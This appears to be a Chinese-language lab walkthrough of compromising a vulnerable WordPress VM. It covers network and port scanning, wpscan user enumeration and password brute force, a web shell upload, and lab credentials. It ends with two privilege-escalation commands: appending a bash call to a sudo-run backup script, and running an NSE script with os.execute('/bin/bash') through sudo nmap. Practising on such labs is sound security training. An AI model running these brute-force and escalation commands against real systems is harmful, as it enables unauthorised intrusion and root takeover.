搜索靶机的ip地址
arp-scan -l
靶机:192.168.149.145
主机:192.168.149.129
扫描端口
nmap -sS -A 192.168.149.145 -p-
访问80端口,无法访问,但是有显示wordy,需要重新编辑hosts文件
扫描目录
文件扫描:dirsearch -u "http://wordy"
信息收集
登录网站
发现wp-login.php,访问后出现登录界面
爆破用户名
利用wpscan工具,输入
wpscan --url http://wordy/ -e u
爆破出五个用户名:
admin、mark、graham、sarah、jens
根据靶机简介,可以找到一个密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
爆破密码
wpscan --url http://wordy/ -e -U use.txt -P passwords.txt
Username: mark, Password: helpdesk01
登录
上传文件
shell上传
上传shell,抓包,并监听端口
交互
查看用户
进入mark 的目录下
打开文件
找到用户名和密码:graham - GSo7isUM1D4
切换用户
在/home/jens下找到一个文件
#!/bin/sh表示用/bin/sh解释脚本并执行
添加echo "/bin/bash" >> backups.sh
提权
sudo -u jens ./backups.sh
查看是否有提权的工具
利用 nmap 提权
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root
echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件,并且写入os.execute("/bin/bash")
解释:
--script: 指定自己的脚本文件
sudo -u root nmap --script=shell.nse #以root用户执行 nmap